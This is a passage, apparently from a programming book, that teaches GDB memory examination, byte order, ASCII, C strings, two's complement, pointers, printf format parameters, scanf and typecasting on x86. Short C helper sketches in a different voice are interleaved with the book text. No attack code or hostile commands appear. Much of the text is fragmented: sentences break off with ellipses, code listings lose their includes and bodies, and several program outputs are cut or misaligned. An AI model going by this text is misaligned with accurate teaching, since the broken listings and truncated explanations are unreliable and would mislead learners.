(gdb) x/x $eip
0x8048384:      0x00fc45c7
(gdb) x/u $eip
0x8048384:      16532935
(gdb) x/t $eip
0x8048384:      00000000111111000100010111000111
(gdb)

The memory the EIP register is pointing to can be examined by using the
address stored in EIP
...
The value 077042707 in
octal is the same as 0x00fc45c7 in hexadecimal, which is the same as 16532935 in
base-10 decimal, which in turn is the same as 00000000111111000100010111000111
in binary
...
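
If you'd like to double-check these conversions outside of GDB, printf() in C can print one value in several bases. The sketch below assumes a 32-bit unsigned int; describe_value is a hypothetical helper name.

```c
#include <stdio.h>

/* Format one value as octal, hexadecimal, and unsigned decimal,
   separated by spaces. (describe_value is an illustrative name.) */
void describe_value(unsigned int value, char *out, size_t len)
{
    /* %o prints octal, %08x prints hex padded to 8 digits, %u prints decimal.
       The leading 0 and 0x are added by hand to match GDB's notation. */
    snprintf(out, len, "0%o 0x%08x %u", value, value, value);
}
```

Passing in 0x00fc45c7 fills the buffer with 077042707 0x00fc45c7 16532935, the same three values GDB showed for the memory at EIP.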

(gdb) x/2x $eip
0x8048384:      0x00fc45c7      0x83000000
(gdb) x/12x $eip
0x8048384:      0x00fc45c7      0x83000000      0x7e09fc7d      0xc713eb02
0x8048394:      0x84842404      0x01e80804      0x8dffffff      0x00fffc45
0x80483a4:      0xc3c9e5eb      0x90909090      0x90909090      0x5de58955
(gdb)

The default size of a single unit is a four-byte unit called a word
...
The valid size letters are as follows:
b    A single byte
h    A halfword, which is two bytes in size
w    A word, which is four bytes in size
g    A giant, which is eight bytes in size

This is slightly confusing, because sometimes the term word also refers to
2-byte values
...
In this
book, words and DWORDs both refer to 4-byte values
...
The following GDB output shows
memory displayed in various sizes
...

The first examine command shows the first eight bytes, and naturally, the
examine commands that use bigger units display more data in total
...
This same byte-reversal effect can be seen
when a full four-byte word is shown as 0x00fc45c7, but when the first four bytes
are shown byte by byte, they are in the order of 0xc7, 0x45, 0xfc, and 0x00
...
For example,
if four bytes are to be interpreted as a single value, the bytes must be used
in reverse order
...
Revisiting these
values displayed both as hexadecimal and unsigned decimals might help
clear up any confusion
...
Exit anyway? (y or n) y
reader@hacking:~/booksrc $ bc -ql
199*(256^3) + 69*(256^2) + 252*(256^1) + 0*(256^0)
3343252480
0*(256^3) + 252*(256^2) + 69*(256^1) + 199*(256^0)
16532935
quit
reader@hacking:~/booksrc $


The first four bytes are shown both in hexadecimal and standard unsigned
decimal notation
...
The byte order of a given architecture is an
important detail to be aware of
...
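
The same arithmetic done with bc can be sketched in C. The two helper names below are my own; they assemble four bytes into one 32-bit value, first treating the earliest byte as least significant (little-endian, as on x86) and then as most significant (big-endian).

```c
#include <stdint.h>

/* Interpret four bytes as a little-endian 32-bit value:
   the first byte in memory is the least significant. */
uint32_t read_le32(const unsigned char b[4])
{
    return (uint32_t)b[0]
         | ((uint32_t)b[1] << 8)
         | ((uint32_t)b[2] << 16)
         | ((uint32_t)b[3] << 24);
}

/* Interpret the same four bytes as a big-endian 32-bit value:
   the first byte in memory is the most significant. */
uint32_t read_be32(const unsigned char b[4])
{
    return ((uint32_t)b[0] << 24)
         | ((uint32_t)b[1] << 16)
         | ((uint32_t)b[2] << 8)
         | (uint32_t)b[3];
}
```

For the bytes 0xc7, 0x45, 0xfc, and 0x00, read_le32() gives 16532935 and read_be32() gives 3343252480, matching the two bc results.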

In addition to converting byte order, GDB can do other conversions with
the examine command
...
The examine
command also accepts the format letter i, short for instruction, to display the
memory as disassembled assembly language instructions
...
/a
...
so
...

(gdb) break main
Breakpoint 1 at 0x8048384: file firstprog
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:6
6         for(i=0; i < 10; i++)
(gdb) i r $eip
eip            0x8048384        0x8048384
(gdb) x/i $eip
0x8048384:      mov    DWORD PTR [ebp-4],0x0
(gdb) x/3i $eip
0x8048384:      mov    DWORD PTR [ebp-4],0x0
0x804838b:      cmp    DWORD PTR [ebp-4],0x9
0x804838f:      jle    0x8048393
(gdb) x/7xb $eip
0x8048384:      0xc7    0x45    0xfc    0x00    0x00    0x00    0x00
(gdb) x/i $eip
0x8048384:      mov    DWORD PTR [ebp-4],0x0
(gdb)

In the output above, the a
...
Since the EIP register is pointing to memory that actually contains machine language instructions, they disassemble quite nicely
...

8048384:   c7 45 fc 00 00 00 00    mov    DWORD PTR [ebp-4],0x0

This assembly instruction will move the value of 0 into memory located
at the address stored in the EBP register, minus 4
...
Basically, this command will zero out the
variable i for the for loop
...
The memory at this location can be
examined several different ways
...
The examine command can examine this memory address
directly or by doing the math on the fly
...
This variable named $1 can be used later to quickly re-access
a particular location in memory
...

Let’s execute the current instruction using the command nexti, which is
short for next instruction
...

(gdb) nexti
0x0804838b      6         for(i=0; i < 10; i++)
(gdb) x/4xb $1
0xbffff804:     0x00    0x00    0x00    0x00
(gdb) x/dw $1
0xbffff804:     0
(gdb) i r eip
eip            0x804838b        0x804838b
(gdb) x/i $eip
0x804838b:      cmp    DWORD PTR [ebp-4],0x9
(gdb)

As predicted, the previous command zeroes out the 4 bytes found at EBP
minus 4, which is memory set aside for the C variable i
...
The next few instructions actually make more sense to
talk about in a group
...
The next instruction,
jle, stands for jump if less than or equal to
...
In this case the
instruction says to jump to the address 0x8048393 if the value stored in memory
for the C variable i is less than or equal to the value 9
...
This will cause the EIP to jump to the address 0x80483a6
...
The first address of 0x8048393 (shown in
bold) is simply the instruction found after the fixed jump instruction, and
the second address of 0x80483a6 (shown in italics) is located at the end of the
function
...

(gdb) nexti
0x0804838f      6         for(i=0; i < 10; i++)
(gdb) x/i $eip
0x804838f:      jle    0x8048393
(gdb) nexti
8           printf("Hello, world!\n");
(gdb) i r eip
eip            0x8048393        0x8048393
(gdb) x/2i $eip
0x8048393:      mov    DWORD PTR [esp],0x8048484
0x804839a:      call   0x80482a0
(gdb)

As expected, the previous two instructions let the program execution
flow down to 0x8048393, which brings us to the next two instructions
...
But what is ESP
pointing to?
(gdb) i r esp
esp            0xbffff800       0xbffff800
(gdb)

Currently, ESP points to the memory address 0xbffff800, so when the mov
instruction is executed, the address 0x8048484 is written there
...

(gdb) x/2xw 0x8048484
0x8048484:      0x6c6c6548      0x6f57206f
(gdb) x/6xb 0x8048484
0x8048484:      0x48    0x65    0x6c    0x6c    0x6f    0x20
(gdb) x/6ub 0x8048484
0x8048484:      72      101     108     108     111     32
(gdb)

A trained eye might notice something about the memory here, in particular the range of the bytes
...
These bytes fall within
the printable ASCII range
...

The bytes 0x48, 0x65, 0x6c, and 0x6f all correspond to letters in the alphabet on
the ASCII table shown below
...

ASCII Table
Oct   Dec   Hex   Char        Oct   Dec   Hex   Char
------------------------------------------------------
000   0     00    NUL '\0'    100   64    40    @
001   1     01    SOH         101   65    41    A
002   2     02    STX         102   66    42    B
003   3     03    ETX         103   67    43    C
004   4     04    EOT         104   68    44    D
005   5     05    ENQ         105   69    45    E
006   6     06    ACK         106   70    46    F
007   7     07    BEL '\a'    107   71    47    G
010   8     08    BS  '\b'    110   72    48    H
011   9     09    HT  '\t'    111   73    49    I
012   10    0A    LF  '\n'    112   74    4A    J
013   11    0B    VT  '\v'    113   75    4B    K
014   12    0C    FF  '\f'    114   76    4C    L
015   13    0D    CR  '\r'    115   77    4D    M
016   14    0E    SO          116   78    4E    N
017   15    0F    SI          117   79    4F    O
020   16    10    DLE         120   80    50    P
021   17    11    DC1         121   81    51    Q
022   18    12    DC2
023   19    13    DC3
024   20    14    DC4
025   21    15    NAK
026   22    16    SYN
027   23    17    ETB
030   24    18    CAN
031   25    19    EM
032   26    1A    SUB
033   27    1B    ESC
034   28    1C    FS
035   29    1D    GS
036   30    1E    RS
037   31    1F    US
040   32    20    SPACE
041   33    21    !
042   34    22    "
043   35    23    #
044   36    24    $
045   37    25    %
046   38    26    &
047   39    27    '
050   40    28    (
051   41    29    )
052   42    2A    *
053   43    2B    +
054   44    2C    ,
055   45    2D
056   46    2E
057   47    2F
060   48    30
061   49    31
062   50    32
063   51    33
064   52    34
065   53    35
066   54    36
067   55    37
070   56    38
071   57    39
072   58    3A
073   59    3B
074   60    3C
075   61    3D
076   62    3E
077   63    3F

...
The c format letter can be used to automatically
look up a byte on the ASCII table, and the s format letter will display an
entire string of character data
...
This string is the argument for the printf() function, which indicates that moving the address of this string (0x8048484) to the address
stored in ESP has something to do with this function
...

(gdb) x/2i $eip
0x8048393:      mov    DWORD PTR [esp],0x8048484
0x804839a:      call   0x80482a0
(gdb) x/xw $esp
0xbffff800:     0xb8000ce0
(gdb) nexti
0x0804839a      8           printf("Hello, world!\n");
(gdb) x/xw $esp
0xbffff800:     0x08048484
(gdb)

The next instruction actually calls the printf() function; it prints the
data string
...

(gdb) x/i $eip
0x804839a:      call   0x80482a0
(gdb) nexti
Hello, world!
6         for(i=0; i < 10; i++)
(gdb)

Continuing to use GDB to debug, let’s examine the next two instructions
...

(gdb) x/2i $eip
0x804839f:      lea    eax,[ebp-4]
0x80483a2:      inc    DWORD PTR [eax]
(gdb)

These two instructions basically just increment the variable i by 1
...
The execution of this
instruction is shown below
...
The execution of this instruction is also
shown below
...
This behavior corresponds to a portion of C
code in which the variable i is incremented in the for loop
...

(gdb) x/i $eip
0x80483a4:      jmp    0x804838b
(gdb)

When this instruction is executed, it will send the program back to the
instruction at address 0x804838b
...

Looking at the full disassembly again, you should be able to tell which
parts of the C code have been compiled into which machine instructions
...

(gdb) list
1
#include ...
The program execution will jump back to the compare instruction, continue to execute the
printf() call, and increment the counter variable until it finally equals 10
...

0x260 Back to Basics

Now that the idea of programming is less abstract, there are a few other
important concepts to know about C
...
In the same way
that knowing a little about Latin can greatly improve one’s understanding of
the English language, knowledge of low-level programming concepts can
assist the comprehension of higher-level ones
...

0x261 Strings

The value "Hello, world!\n" passed to the printf() function in the previous
program is a string—technically, a character array
...
A 20-character array is simply 20
adjacent characters located in memory
...

The char_array
...

char_array
...
h>
int main()
{
char str_a[20];
str_a[0] = 'H';
str_a[1] = 'e';
str_a[2] = 'l';
str_a[3] = 'l';
str_a[4] = 'o';
str_a[5] = ',';
str_a[6] = ' ';
str_a[7] = 'w';
str_a[8] = 'o';
str_a[9] = 'r';
str_a[10] = 'l';
str_a[11] = 'd';
str_a[12] = '!';
str_a[13] = '\n';
str_a[14] = 0;
printf(str_a);
}

The GCC compiler can also be given the -o switch to define the output
file to compile to
...

reader@hacking:~/booksrc $ gcc -o char_array char_array
...
/char_array
Hello, world!
reader@hacking:~/booksrc $

In the preceding program, a 20-element character array is defined as
str_a, and each element of the array is written to, one by one
...
Also notice that the last character is a 0
...
The character array was defined, so 20 bytes
are allocated for it, but only 15 of these bytes are actually used (14 characters plus the terminating null byte)
...
The remaining extra bytes are
just garbage and will be ignored
...
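
Here is a small sketch of why the leftover bytes don't matter. It fills a 20-byte array with the letter X to stand in for garbage, copies the greeting over the front of it, and then measures the string. The function name greeting_length is made up for this example.

```c
#include <stdio.h>
#include <string.h>

/* Fill a 20-byte array with 'X' as pretend garbage, copy the greeting
   into it, print it, and return how many characters come before the
   null byte. (greeting_length is an illustrative name.) */
size_t greeting_length(void)
{
    char str_a[20];

    memset(str_a, 'X', sizeof(str_a));   /* pretend garbage in all 20 bytes */
    strcpy(str_a, "Hello, world!\n");    /* 14 characters plus a null byte */

    /* str_a[15] through str_a[19] still hold 'X', but printf() and
       strlen() both stop at the null byte stored in str_a[14]. */
    printf("%s", str_a);
    return strlen(str_a);
}
```

The function prints only the greeting and returns 14; the X bytes after the null byte never show up.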

Since setting each character in a character array is painstaking and
strings are used fairly often, a set of standard functions was created for string
manipulation
...

The order of the function’s arguments is similar to Intel assembly syntax:
destination first and then source
...
c program can be rewritten
using strcpy() to accomplish the same thing using the string library
...
h since
it uses a string function
...
c
#include ...
h>
int main() {
char str_a[20];
strcpy(str_a, "Hello, world!\n");
printf(str_a);
}

Let’s take a look at this program with GDB
...
The debugger will pause the program at
each breakpoint, giving us a chance to examine registers and memory
...

reader@hacking:~/booksrc $ gcc -g -o char_array2 char_array2
...
/char_array2
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2
#include ...
c, line 6
...

Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 2 (strcpy) pending
...
c, line 8
...
At each
breakpoint, we’re going to look at EIP and the instructions it points to
...

(gdb) run
Starting program: /home/reader/booksrc/char_array2
Breakpoint 4 at 0xb7f076f4
Pending breakpoint "strcpy" resolved
Breakpoint 1, main () at char_array2
...

Breakpoint 4, 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc
...
6
(gdb) i r eip
eip            0xb7f076f4       0xb7f076f4
(gdb) x/5i $eip
0xb7f076f4:     mov    esi,DWORD PTR [ebp+8]
0xb7f076f7:     mov    eax,DWORD PTR [ebp+12]
0xb7f076fa:     mov    ecx,esi
0xb7f076fc:     sub    ecx,eax
0xb7f076fe:     mov    edx,eax
(gdb) continue
Continuing
...
c:8
8         printf(str_a);
(gdb) i r eip
eip            0x80483d7        0x80483d7
(gdb) x/5i $eip
0x80483d7:      lea    eax,[ebp-40]
0x80483da:      mov    DWORD PTR [esp],eax
0x80483dd:      call   0x80482d4
0x80483e2:      leave
0x80483e3:      ret
(gdb)


The address in EIP at the middle breakpoint is different because the
code for the strcpy() function comes from a loaded library
...
I’d like to
point out that EIP is able to travel from the main code to the strcpy() code
and back again
...
The stack lets EIP return through long
chains of function calls
...
In the output below, the stack backtrace is shown at each breakpoint
...

Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/char_array2
Error in re-setting breakpoint 4:
Function "strcpy" not defined
...
c:7
7
strcpy(str_a, "Hello, world!\n");
(gdb) bt
#0 main () at char_array2
...

Breakpoint 4, 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc
...
6
(gdb) bt
#0 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc
...
6
#1 0x080483d7 in main () at char_array2
...

Breakpoint 3, main () at char_array2
...
c:8
(gdb)

At the middle breakpoint, the backtrace of the stack shows its record of
the strcpy() call
...
This is due to an exploit protection
method that is turned on by default in the Linux kernel since 2
...
11
...

0x262 Signed, Unsigned, Long, and Short

By default, numerical values in C are signed, which means they can be both
negative and positive
...
Since it’s all just memory in the end, all numerical values must be stored
in binary, and unsigned values make the most sense in binary
...
A 32-bit signed integer is still just 32 bits, which means it can
only be in one of 2^32 possible bit combinations
...
Essentially, one of
the bits is a flag marking the value positive or negative
...
Two’s complement represents negative numbers in a form suited for binary adders—when a negative value in
two’s complement is added to a positive number of the same magnitude, the
result will be 0
...
It sounds strange, but it works and
allows negative numbers to be added in combination with positive numbers
using simple binary adders
...
For simplicity’s sake, 8-bit numbers are used in this example
...
Then all the
bits are flipped, and 1 is added to result in the two’s complement representation for negative 73, 10110111
...
The program pcalc shows the value 256
because it’s not aware that we’re only dealing with 8-bit values
...
This example might shed some
light on how two’s complement works its magic
...
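
The flip-the-bits-and-add-1 recipe is short enough to try in C. This is a minimal sketch using 8-bit values from stdint.h; the function name twos_complement_negate is my own.

```c
#include <stdint.h>

/* Negate an 8-bit value the two's complement way:
   flip every bit, then add 1. The cast throws away anything above 8 bits.
   (twos_complement_negate is an illustrative name.) */
uint8_t twos_complement_negate(uint8_t value)
{
    return (uint8_t)(~value + 1);
}

/* Add a value to its own two's complement, keeping only the low 8 bits. */
uint8_t add_to_negative(uint8_t value)
{
    return (uint8_t)(value + twos_complement_negate(value));
}
```

For 73 (01001001), twos_complement_negate() returns 0xb7 (10110111). Adding the two gives 256, which needs a ninth bit; once that carry is dropped, add_to_negative(73) is 0.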
An unsigned integer would be declared
with unsigned int
...
The actual sizes will vary
depending on the architecture the code is compiled for
...
This works like a function that takes a data type as its input and returns
the size of a variable declared with that data type for the target architecture
...
c program explores the sizes of various data types, using
the sizeof() function
...
c
#include ...

It uses something called a format specifier to display the value returned from
the sizeof() function calls
...

reader@hacking:~/booksrc $ gcc datatype_sizes
...
/a
...
A float is also four bytes, while a char only needs
a single byte
...
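
A quick way to check these sizes on whatever machine you happen to be using is to ask the compiler directly. This is a sketch of my own rather than the book's listing; print_sizes is a hypothetical name, and the %zu format parameter is the standard way to print the value sizeof() gives back.

```c
#include <stdio.h>

/* Print the size in bytes of several common data types.
   Only sizeof(char) == 1 is guaranteed; the rest depend on the
   architecture the code is compiled for. */
void print_sizes(void)
{
    printf("char:         %zu\n", sizeof(char));
    printf("short int:    %zu\n", sizeof(short int));
    printf("int:          %zu\n", sizeof(int));
    printf("unsigned int: %zu\n", sizeof(unsigned int));
    printf("long int:     %zu\n", sizeof(long int));
    printf("float:        %zu\n", sizeof(float));
}
```

The numbers printed may differ from one machine to the next, which is exactly why sizeof() is worth using instead of hard-coding sizes.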

0x263 Pointers

The EIP register is a pointer that “points” to the current instruction during a
program’s execution by containing its memory address
...
Since the physical memory cannot actually be moved, the
information in it must be copied
...
This is also expensive from a memory standpoint, since space for
the new destination copy must be saved or allocated before the source can be
copied
...
Instead of copying a large
block of memory, it is much simpler to pass around the address of the beginning of that block of memory
...

Since memory on the x86 architecture uses 32-bit addressing, pointers are
also 32 bits in size (4 bytes)
...
Instead of defining a variable of that type, a pointer is
defined as something that points to data of that type
...
c program
is an example of a pointer being used with the char data type, which is only
1 byte in size
...
c
#include ...
h>
int main() {
   char str_a[20];  // A 20-element character array
   char *pointer;   // A pointer, meant for a character array
   char *pointer2;  // And yet another one

   strcpy(str_a, "Hello, world!\n");
   pointer = str_a; // Set the first pointer to the start of the array
...

// Print it
...

// Print again
...
When the character array is referenced like this,
it is actually a pointer itself
...
The second pointer is set to the
first pointer’s address plus two, and then some things are printed (shown in
the output below)
...
c
reader@hacking:~/booksrc $
...
The program is recompiled, and a
breakpoint is set on the tenth line of the source code
...

reader@hacking:~/booksrc $ gcc -g -o pointer pointer
...
/pointer
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2
#include ...

(gdb)
11         printf(pointer);
12
13         pointer2 = pointer + 2; // Set the second one 2 bytes further in
...

15         strcpy(pointer2, "y you guys!\n"); // Copy into that spot
...

17      }
(gdb) break 11
Breakpoint 1 at 0x80483dd: file pointer
...

(gdb) run
Starting program: /home/reader/booksrc/pointer
Breakpoint 1, main () at pointer
...
Remember that
the string itself isn’t stored in the pointer variable—only the memory address
0xbffff7e0 is stored there
...
The address-of operator is a unary operator,
which simply means it operates on a single argument
...
When it’s used, the address
of that variable is returned, instead of the variable itself
...

(gdb) x/xw &pointer
0xbffff7dc:     0xbffff7e0
(gdb) print &pointer
$1 = (char **) 0xbffff7dc
(gdb) print pointer
$2 = 0xbffff7e0 "Hello, world!\n"
(gdb)

When the address-of operator is used, the pointer variable is shown to
be located at the address 0xbffff7dc in memory, and it contains the address
0xbffff7e0
...
The addressof
...
This line is shown in bold below
...
c
#include ...

reader@hacking:~/booksrc $ gcc -g addressof
...
/a
...
so
...

(gdb) list
1
#include ...

8
}
(gdb) break 8
Breakpoint 1 at 0x8048361: file addressof
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:8
8
}
(gdb) print int_var
$1 = 5
(gdb) print &int_var
$2 = (int *) 0xbffff804
(gdb) print int_ptr
$3 = (int *) 0xbffff804
(gdb) print &int_ptr
$4 = (int **) 0xbffff800
(gdb)

As usual, a breakpoint is set and the program is executed in the
debugger
...
The first
print command shows the value of int_var, and the second shows its address
using the address-of operator
...


An additional unary operator called the dereference operator exists for use
with pointers
...
It takes the form of an
asterisk in front of the variable name, similar to the declaration of a pointer
...
Used in
GDB, it can retrieve the integer value int_ptr points to
...
c code (shown in addressof2
...
The added printf() functions use format
parameters, which I’ll explain in the next section
...

addressof2
...
h>
int main() {
int int_var = 5;
int *int_ptr;
int_ptr = &int_var; // Put the address of int_var into int_ptr
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
int_ptr = 0xbffff834
&int_ptr = 0xbffff830
*int_ptr = 0x00000005
int_var is located at 0xbffff834 and contains 5
int_ptr is located at 0xbffff830, contains 0xbffff834, and points to 5
reader@hacking:~/booksrc $

When the unary operators are used with pointers, the address-of operator can be thought of as moving backward, while the dereference operator
moves forward in the direction the pointer is pointing
...
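
The two operators can be seen working together in a pair of small functions. This is a sketch with names of my own choosing: the caller uses the address-of operator to hand over a pointer, and the functions use the dereference operator to follow it.

```c
#include <stdio.h>

/* Store new_value into the int that target points to. */
void set_through_pointer(int *target, int new_value)
{
    *target = new_value;   /* dereference: follow the pointer forward */
}

/* Print where an int lives and what it holds, then return the value. */
int show_int(int *int_ptr)
{
    printf("int_ptr = %p, *int_ptr = %d\n", (void *)int_ptr, *int_ptr);
    return *int_ptr;
}
```

With int int_var = 5; declared in the caller, show_int(&int_var) returns 5, and after set_through_pointer(&int_var, 7) the variable itself holds 7, even though neither function was ever given its name.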
This
function can also use format strings to print variables in many different formats
...
The way the printf() function has been used in the
previous programs, the "Hello, world!\n" string technically is the format string;
however, it is devoid of special escape sequences
...
Each format parameter
begins with a percent sign (%) and uses a single-character shorthand very
similar to formatting characters used by GDB’s examine command
...
There are also some format parameters that expect
pointers, such as the following
...
The %n
format parameter is unique in that it actually writes data
...

For now, our focus will just be the format parameters used for displaying
data
...
c program shows some examples of different format
parameters
...
c
#include ...
The final printf()
call uses the argument &A, which will provide the address of the variable A
...

reader@hacking:~/booksrc $ gcc -o fmt_strings fmt_strings
...
/fmt_strings
[A] Dec: -73, Hex: ffffffb7, Unsigned: 4294967223
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: '     31337', '00031337'
[string] sample Address bffff870
variable A is at address: bffff86c
reader@hacking:~/booksrc $

The first two calls to printf() demonstrate the printing of variables A and B,
using different format parameters
...
The
%d format parameter allows for negative values, while %u does not, since it is
expecting unsigned values
...
This is because A is a negative number stored in two’s
complement, and the format parameter is trying to print it as if it were an
unsigned value
...

The third line in the example, labeled [field width on B], shows the use
of the field-width option in a format parameter
...
However,
this is not a maximum field width—if the value to be outputted is greater
than the field width, the field width will be exceeded
...
When 10 is used as the field width,
5 bytes of blank space are outputted before the output data
...
When 08 is used, for example, the output is 00031337
...
Remember that the variable string is actually a pointer containing
the address of the string, which works out wonderfully, since the %s format
parameter expects its data to be passed by reference
...
This value is displayed as eight
hexadecimal digits, padded by zeros
...
Minimum field widths can be set by putting a
number right after the percent sign, and if the field width begins with 0, it
will be padded with zeros
...
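
Field widths are easy to experiment with using snprintf(), which formats into a buffer instead of printing. The sketch below uses a helper name of my own, format_widths, and reuses the three widths discussed here: 3, 10, and 08.

```c
#include <stdio.h>

/* Format the same value with a field width of 3, a field width of 10,
   and a zero-padded field width of 8. (format_widths is an
   illustrative name.) */
void format_widths(int value, char *out, size_t len)
{
    /* %3d  : minimum width 3, exceeded if the value needs more room
       %10d : minimum width 10, padded on the left with spaces
       %08d : minimum width 8, padded on the left with zeros */
    snprintf(out, len, "3: '%3d', 10: '%10d', '%08d'", value, value, value);
}
```

For the value 31337 the buffer ends up holding 3: '31337', 10: '     31337', '00031337'.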
So far, so good
...
One key difference is that the scanf() function expects all
of its arguments to be pointers, so the arguments must actually be variable
addresses—not the variables themselves
...
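
Here is a minimal sketch of that rule. To keep it easy to test, it uses sscanf(), a sibling of scanf() that reads from a string instead of the keyboard; the pointer requirement is the same. The name parse_count is hypothetical.

```c
#include <stdio.h>

/* Read a decimal number out of text and store it where count points.
   Returns 1 if a number was read and 0 otherwise. */
int parse_count(const char *text, int *count)
{
    /* count is already a pointer, so it is passed as is. With a plain
       int variable, the caller would pass its address using &. */
    return sscanf(text, "%d", count) == 1;
}
```

A caller with int count; would write parse_count("3", &count), handing over the address of the variable so the function has somewhere to write the result.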
The input
...

input
...
h>
#include ...
c, the scanf() function is used to set the count variable
...

reader@hacking:~/booksrc $ gcc -o input input
...
/input
Repeat how many times? 3
0 - Hello, world!
1 - Hello, world!
2 - Hello, world!
reader@hacking:~/booksrc $
...

In addition, the ability to output the values of variables allows for debugging in
the program, without the use of a debugger
...

0x265 Typecasting

Typecasting is simply a way to temporarily change a variable’s data type, despite
how it was originally defined
...
The syntax for typecasting is
as follows:
(typecast_data_type) variable

This can be used when dealing with integers and floating-point variables,
as typecasting
...

typecasting
...
h>
int main() {
int a, b;
float c, d;
a = 13;
b = 5;
c = a / b;                   // Divide using integers
d = (float) a / (float) b;
...

printf("[integers]\t a = %d\t b = %d\n", a, b);
printf("[floats]\t c = %f\t d = %f\n", c, d);
}

The results of compiling and executing typecasting
...

reader@hacking:~/booksrc $ gcc typecasting
...
/a
...
000000
d = 2
...
However, if these integer variables are typecast into floats, they will
be treated as such
...
6
...
Even though a pointer is just a memory address,
the C compiler still demands a data type for every pointer
...
An integer pointer should only
point to integer data, while a character pointer should only point to character data
...
An integer is four bytes
in size, while a character only takes up a single byte
...
c program will demonstrate and explain these concepts further
...
This is shorthand meant
for displaying pointers and is basically equivalent to 0x%08x
...
c
#include ...

printf("[integer pointer] points to %p, which contains the integer %d\n",
int_pointer, *int_pointer);
int_pointer = int_pointer + 1;
}
for(i=0; i < 5; i++) { // Iterate through the char array with the char_pointer
...
Two pointers are also defined,
one with the integer data type and one with the character data type, and they
are set to point at the start of the corresponding data arrays
...
In the loops, when the integer and character values
are actually printed with the %d and %c format parameters, notice that the
corresponding printf() arguments must dereference the pointer variables
...

reader@hacking:~/booksrc
reader@hacking:~/booksrc
[integer pointer] points
[integer pointer] points
[integer pointer] points
[integer pointer] points
[integer pointer] points
[char pointer] points to
[char pointer] points to
[char pointer] points to
[char pointer] points to
[char pointer] points to
reader@hacking:~/booksrc

$ gcc pointer_types
...
/a
...
Since a char is only 1 byte, the pointer to the next char
would naturally also be 1 byte over
...

In pointer_types2
...
The major changes to the code
are marked in bold
...
c
#include ...

for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...

printf("[char pointer] points to %p, which contains the integer %d\n",
char_pointer, *char_pointer);
char_pointer = char_pointer + 1;
}
}

The output below shows the warnings spewed forth from the compiler
...
c
pointer_types2
...
c:12: warning: assignment from incompatible pointer type
pointer_types2
...
But the compiler
and perhaps the programmer are the only ones that care about a pointer’s
type
...

reader@hacking:~/booksrc $
...
out
[integer pointer] points to 0xbffff810, which contains the char 'a'
[integer pointer] points to 0xbffff814, which contains the char 'e'
[integer pointer] points to 0xbffff818, which contains the char '8'
[integer pointer] points to 0xbffff81c, which contains the char '
[integer pointer] points to 0xbffff820, which contains the char '?'
[char pointer] points to 0xbffff7f0, which contains the integer 1
[char pointer] points to 0xbffff7f1, which contains the integer 0
[char pointer] points to 0xbffff7f2, which contains the integer 0
[char pointer] points to 0xbffff7f3, which contains the integer 0
[char pointer] points to 0xbffff7f4, which contains the integer 2
reader@hacking:~/booksrc $

Even though the int_pointer points to character data that only contains
5 bytes of data, it is still typed as an integer
...
Similarly, the char_pointer’s
address is only incremented by 1 each time, stepping through the 20 bytes of
integer data (five 4-byte integers), one byte at a time
...
The 4-byte value of 0x00000001 is actually stored
in memory as 0x01, 0x00, 0x00, 0x00
...
Since the pointer type determines the
size of the data it points to, it’s important that the type is correct
...
c below, typecasting is just a way to change the type of a
variable on the fly
...
c
#include ...

for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...

printf("[char pointer] points to %p, which contains the integer %d\n",
char_pointer, *char_pointer);
char_pointer = (char *) ((int *) char_pointer + 1);
}
}

In this code, when the pointers are initially set, the data is typecast into
the pointer’s data type
...
To fix that, when 1 is added to the pointers, they must first be typecast into the correct data type so the address is incremented by the correct
amount
...
It doesn’t look too pretty, but it works
...
c
$
...
out
to 0xbffff810, which contains the char 'a'
to 0xbffff811, which contains the char 'b'
to 0xbffff812, which contains the char 'c'
to 0xbffff813, which contains the char 'd'
to 0xbffff814, which contains the char 'e'
0xbffff7f0, which contains the integer 1
0xbffff7f4, which contains the integer 2
0xbffff7f8, which contains the integer 3
0xbffff7fc, which contains the integer 4
0xbffff800, which contains the integer 5
$

Naturally, it is far easier just to use the correct data type for pointers
in the first place; however, sometimes a generic, typeless pointer is desired
...

Experimenting with void pointers quickly reveals a few things about typeless
pointers
...

In order to retrieve the value stored in the pointer’s memory address, the
compiler must first know what type of data it is
...
These are fairly intuitive
limitations, which means that a void pointer’s main purpose is to simply hold
a memory address
...
c program can be modified to use a single void
pointer by typecasting it to the proper type each time it’s used
...
This also means a void pointer must always
be typecast when dereferencing it, however
...
c, which uses a void pointer
...
c
#include ...

printf("[char pointer] points to %p, which contains the char '%c'\n",
void_pointer, *((char *) void_pointer));
void_pointer = (void *) ((char *) void_pointer + 1);
}
void_pointer = (void *) int_array;
for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...
c are as
follows
...
c
$
...
out
0xbffff810, which contains the char 'a'
0xbffff811, which contains the char 'b'
0xbffff812, which contains the char 'c'
0xbffff813, which contains the char 'd'
0xbffff814, which contains the char 'e'
to 0xbffff7f0, which contains the integer 1
to 0xbffff7f4, which contains the integer 2
to 0xbffff7f8, which contains the integer 3
to 0xbffff7fc, which contains the integer 4
to 0xbffff800, which contains the integer 5
$

The compilation and output of this pointer_types4
...
c
...

Since the type is taken care of by the typecasts, the void pointer is truly
nothing more than a memory address
...
In pointer_types5
...

pointer_types5
...
h>
int main() {
int i;
char char_array[5] = {'a', 'b', 'c', 'd', 'e'};
int int_array[5] = {1, 2, 3, 4, 5};
unsigned int hacky_nonpointer;
hacky_nonpointer = (unsigned int) char_array;
for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...

printf("[hacky_nonpointer] points to %p, which contains the integer %d\n",
hacky_nonpointer, *((int *) hacky_nonpointer));
hacky_nonpointer = hacky_nonpointer + sizeof(int);
}
}

This is rather hacky, but since this integer value is typecast into the
proper pointer types when it is assigned and dereferenced, the end result is
the same
...

reader@hacking:~/booksrc $ gcc pointer_types5
...
/a
...
In the end, after the
program has been compiled, the variables are nothing more than memory
addresses
...

0x266

